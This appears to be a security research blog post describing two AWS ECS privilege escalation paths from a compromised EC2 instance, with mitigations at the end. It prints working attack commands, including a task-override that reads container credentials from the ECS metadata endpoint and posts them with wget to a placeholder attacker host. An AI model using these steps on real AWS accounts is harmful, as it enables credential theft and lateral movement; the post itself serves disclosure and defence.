Another ECS Privilege Escalation Path

Introduction

Last year, Reversec (at the time WithSecure) wanted to look into which resources they could compromise from an assumed-breached virtual machine (EC2) instance within a simulated client’s environment. This was inspired by configurations we often see within our client work in engagements such as Attack Path Mapping (APM). Discovery and exploitation of new paths is useful to perform privilege escalation or lateral movement. Our lab setup was as follows:

AWS Architecture Diagram of ECS, EC2 and Supporting Services

By starting from a “compromised” EC2 instance within our lab environment, and ReadOnly access to the AWS account to provide us with additional visibility on our resources, we were able to discover a novel attack path. Through the configuration of EC2 and Elastic Container Service (ECS) resources, we were able to escalate our initial privileges and access secrets that we had created for the purposes of testing. In real engagements, this could allow us to pivot between previously segregated environments, or access areas requiring authentication.

Attack Paths

Within ECS, many different configurations are possible, so we focus on two specific example attack paths. Of course, differences in any clients’ setups may require some adjustment to these to replicate the attack, especially considering their networking controls. We first demonstrate how to self-register an EC2 to a cluster, then override the task definition’s start command, allowing us to gather the task definition’s IAM credentials. Then we perform our privilege escalation in an environment where the cluster uses Fargate.

Privilege Escalation Paths in a Flowchart

Description

EC2 with StartTask

The instance profile assigned to our assumed-breach EC2 contained the following AWS permissions, of which the first three were contained in the AWS-managed policy AWSElasticBeanstalkMulticontainerDocker:

ecs:StartTask
ecs:RegisterContainerInstance
ecs:DeregisterContainerInstance
iam:PassRole

The iam:PassRole permission was restricted to allowing a single role to be passed. That role had the AWS-managed AmazonECSTaskExecutionPolicy policy attached to it.

This, naturally, suggests that an ECS cluster is running within the account, and so using our ReadOnly permissions, we look to see what infrastructure is running within the cluster. As well as the cluster, which we had called ReversecCluster, only a single task definition had been set up. No running instances were currently available in the cluster.

While initially, it appeared that we had no infrastructure within the cluster on which we could run tasks, our EC2 permissions were able to register a container instance. So, we thought, why not register our current EC2 to the cluster? We found that there were two ways to do this. We could either download and run the ECS agent on our EC2, or we could use the RegisterContainerInstance API directly.

To allow interaction with ECS resources, we downloaded and installed the ECS agent on our EC2. Depending on the Linux distribution installed on the EC2, this was done using one of the following sets of commands.

For Amazon Linux or Red Hat-based distributions:

curl -O https://s3.eu-west-2.amazonaws.com/amazon-ecs-agent-eu-west-2/amazon-ecs-init-latest.x86_64.rpm

sudo yum localinstall -y amazon-ecs-init-latest.x86_64.rpm

Or, for Debian-based distributions:

curl -O https://s3.eu-west-2.amazonaws.com/amazon-ecs-agent-eu-west-2/amazon-ecs-init-latest.amd64.deb

sudo dpkg -i amazon-ecs-init-latest.amd64.deb

Within the AWS documentation, it is stated that RegisterContainerInstance is only supposed to be used by the ECS agent. However, rather than being constrained by what is supposed to happen according to documentation, we spent some time and found the necessary parameters and values to use it ourselves. At this point, we could register our container instance manually from our EC2 using the following commands:

curl http://169.254.169.254/latest/dynamic/instance-identity/document -o document

curl http://169.254.169.254/latest/dynamic/instance-identity/signature -o signature

aws ecs register-container-instance --cluster ReversecCluster --instance-identity-document file://document --instance-identity-document-signature file://signature --total-resources name=CPU,type=INTEGER,integerValue=1

However, an easier route would be to start the ECS service after we have adjusted the /etc/ecs/ecs.config file, as follows, so that our EC2 would be registered with the existing ECS cluster. This must be done using the existing cluster as in this scenario we had no permissions to create a new cluster:

ECS_CLUSTER=ReversecCluster

With that, we started the service and watched to see that our EC2 had been registered as infrastructure within the ECS cluster and was available to run tasks:

sudo systemctl start ecs

To access the containers that were created during task execution, we also needed to install Docker (if this hadn’t already been done):

sudo yum install docker

We discovered that the ECS API StartTask contained an overrides parameter. This had the effect that if a new set of commands was provided through the associated value, these would be executed on container start rather than the commands specified in the task definition. As our objective was to escalate our privileges, we used the following overrides JSON file to cause a container to be created, not perform any actions, but remain alive until such time as it was shut down.

Let us assume that a task definition was already available within the environment. For the purposes of our attack, we do not worry about the commands the tasks is supposed to execute, but we do need to know the task definition’s name so that we can reference it in our API calls and the container’s name to reference in the below overrides file.

{
  "containerOverrides": [
    {
      "name": "ExistingContainer",
      "command": [
        "sleep",
        "infinity"
      ]
    }
  ]
}

With our ReadOnly permissions, we collect the task definition and container names, then use the following command to start the overridden task:

aws ecs start-task --cluster ReversecCluster --container-instances arn:aws:ecs:eu-west-2:111122223333:container-instance/ReversecCluster/5bfcf99482d443129a7360e2d0a712b0 --overrides file://overrides --task-definition ReversecTaskDef --network-configuration "awsvpcConfiguration={subnets=[subnet-05370db71332997ac],securityGroups=[sg-029098f0f1df1377c],assignPublicIp=DISABLED}"

A few of the parameters needed populating for the command to work correctly. With ReadOnly access within the account, we were able to enumerate these simply by searching. However, the container-instances value could be found by checking the /var/log/ecs/ecs-init.log file on the EC2. The subnet and the Security Groups could be found by checking the Instance Metadata Service (IMDS) within the EC2 at the following respective endpoints:

http://169.254.169.254/latest/meta-data/network/interfaces/macs/02:7d:7e:c3:c5:0b/subnet-id 

http://169.254.169.254/latest/meta-data/network/interfaces/macs/02:7d:7e:c3:c5:0b/security-group-ids

Note that if we had been granted the iam:PassRole permission with a broader set of roles, we could also have added in a taskRoleArn parameter to our overrides file. This would have allowed us to escalate to that role, in a more classic ECS privilege escalation technique. However, in this setup, we were unable to adjust the role of the ECS task. Additionally, assignPublicIp is set to DISABLED here, however, this may require adjusting depending on the networking setup in the target environment.

As the task had then been started on a container held within the EC2 over which we have command execution, we were able to find the container ID by running:

sudo docker ps

Once the container had initialised, we can start a shell within it:

sudo docker exec -it 700f993d892f sh

By making use of the standard environment variables within an ECS container, we get the ECS Instance Metadata Service (IMDS) URL we need to call to obtain the credentials of the ECS task definition:

curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

At this point, by using these temporary credentials, we have escalated our privileges from those assigned to the EC2 instance to the ones assigned to the ECS task definition. In client environments we have seen that these tasks may be used to retrieve secrets from Secrets Manager or be assigned other privileged permissions.

As a note, Reversec tried to execute this full attack path multiple times to demonstrate that it was consistently possible. To do this, we deregistered the EC2 as a container instance so that we could start afresh. However, we found errors when trying to register it again. After some searching, we came across an issue in the ECS agent’s GitHub repository. This explained that deregistering is supposed to be final, but it was possible to overcome this by “remove the agent’s checkpointed data (at /var/lib/ecs/data/* by default) before starting the agent, but all previously managed containers will be forgotten about or ‘orphaned’ as well.”

Fargate with RunTask

As a variation of the technique described before, we considered the use of the RunTask API, on Fargate. As Fargate provisioned the necessary infrastructure on demand, fewer permissions were needed. The attack worked with the EC2 instance having only:

ecs:RunTask
iam:PassRole

As before, the iam:PassRole permission was restricted to allow a single role to be passed. That role contained the AWS-managed AmazonECSTaskExecutionPolicy.

In this case, we set the assignPublicIp to ENABLED to allow our ECS task to download an image (alpine) from the public Docker registry and call out to our “attacker” EC2 hosted in a separate AWS account. To improve our automation, we could obtain the credentials and then send them directly to our attacker-owned EC2 within the overrides file. Here, we show the wget command being used in the overrides file, as curl is not available in the alpine Docker image:

{
  "containerOverrides": [
    {
      "name": "TTMContainer",
      "command": [
        "/bin/sh",
        "-c",
        "wget -O creds http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI && wget --post-file creds http://<attacker-ip>:4242"
      ]
    }
  ]
}

Enumerating as described earlier, we then used the command:

aws ecs run-task --cluster arn:aws:ecs:eu-west-1:637423251906:cluster/ReversecCluster2 --task-definition arn:aws:ecs:eu-west-1:637423251906:task-definition/WSTaskDef2:1 --network-configuration "awsvpcConfiguration={subnets=[subnet-0a9c3f5a41d855357],securityGroups=[sg-0bea7c2c147b18329],assignPublicIp=ENABLED}" --overrides file://overrides

A netcat listener, listening on port 4242 on our “attacker” EC2 received the credentials, allowing us to assume the task’s role as expected. This completed our privilege escalation within the environment in a second manner.

Preventing these Attack Paths

As may have been apparent in the previous section, it is not straightforward to remove this type of privilege escalation if your EC2 is required to interact with ECS. The first question to ask is “does my EC2 really need to start or run tasks?”, as often these may be scheduled events which are more suited to EventBridge Scheduler, or tasks started through the CI/CD pipeline. If an attacker is able find valid credentials with which to use AWS CLI commands to call the StartTask or RunTask APIs, restricting their ability to override the task was not found to be possible. However, the use of task placement constraints may restrict an attacker’s ability to run the task.

If the interaction between EC2 and ECS is required, the best defence is ensuring that the tasks are pre-defined, perhaps through Infrastructure as Code, and using a proxy to execute them. For example, a Lambda function could be set up which has a predefined set of parameters when calling StartTask or RunTask and takes no inputs which would be passed to ECS. The EC2 instance would then invoke the Lambda to start or run a task, and it would not be possible to inject any additional command line options. The instance profile attached to the EC2 should specify that it may invoke the relevant Lambda function. The Lambda function’s resource policy should be restricted as much as possible, though it is not possible to use a resource policy to specify which EC2 instances may invoke it. Condition keys within the IAM policy must therefore be applied practically and sensibly.

EC2 calling a Lambda, in a Flowchart

The following additional defence in depth measures may be applied to attempt to mitigate the attack path, but by themselves these do not address the root cause of the issue:

Don’t Use Easily Guessable Cluster or Task Names

If the default cluster still exists, this should be removed in favour of a user-defined entity. As described earlier, these must be known to an attacker for this attack path to succeed. This, however, would not protect against an attacker with read privileges within the AWS account, for example an insider threat. While one may reduce the need for human interaction in production systems, attempting to apply security through obscurity remains a flawed approach.

Follow the Principle of Least Privilege

Apply the principle of least privilege to any resources and policies within the environment. This should include using a lower-privileged user for EC2 operations. For example, if the EC2 is running a web application, the www-data user could be used for this purpose and security assessments could be performed to ensure there are no privilege escalation paths to the root user. While this would prevent a threat actor with a foothold on the EC2 from self-registering to a cluster, StartTask and RunTask operations would not be prevented.

Restrict Traffic through Networking Controls

Similarly, ensure Security Groups are used to restrict inbound and outbound traffic to and from EC2s, so that instances which have self-registered to the cluster cannot send traffic to a location of the attacker’s choosing. Remove default Security Groups, as if a task is able to execute with an attacker-defined awsvpc network mode, they could apply the default, unrestrictive, Security Group. Alternatively, clusters could be set up in isolated VPCs as per AWS guidance.